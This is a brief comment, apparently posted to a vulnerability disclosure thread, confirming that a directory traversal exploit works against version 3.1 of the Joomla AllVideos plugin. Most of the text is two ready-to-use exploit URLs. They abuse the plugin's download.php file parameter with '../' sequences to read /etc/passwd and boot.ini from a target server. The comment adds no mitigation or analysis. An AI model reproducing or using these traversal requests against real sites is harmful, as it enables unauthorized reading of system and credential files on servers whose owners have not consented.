Hey There,

I was able to exploit this issue, by slightly modifying the exploit you described against the latest version v3.1 (plg_jw_allvideos-v3.1_j1.5.zip). You can download it from here

http://joomlaworks.googlecode.com/files/plg_jw_allvideos-v3.1_j1.5.zip

Here’s an example :

http://site.com/plugins/content/jw_allvideos/includes/download.php?file=images/../../../../../../etc/passwd

or

http://site.com/plugins/content/jw_allvideos/includes/download.php?file=images/../../../../../../boot.ini


-Mehul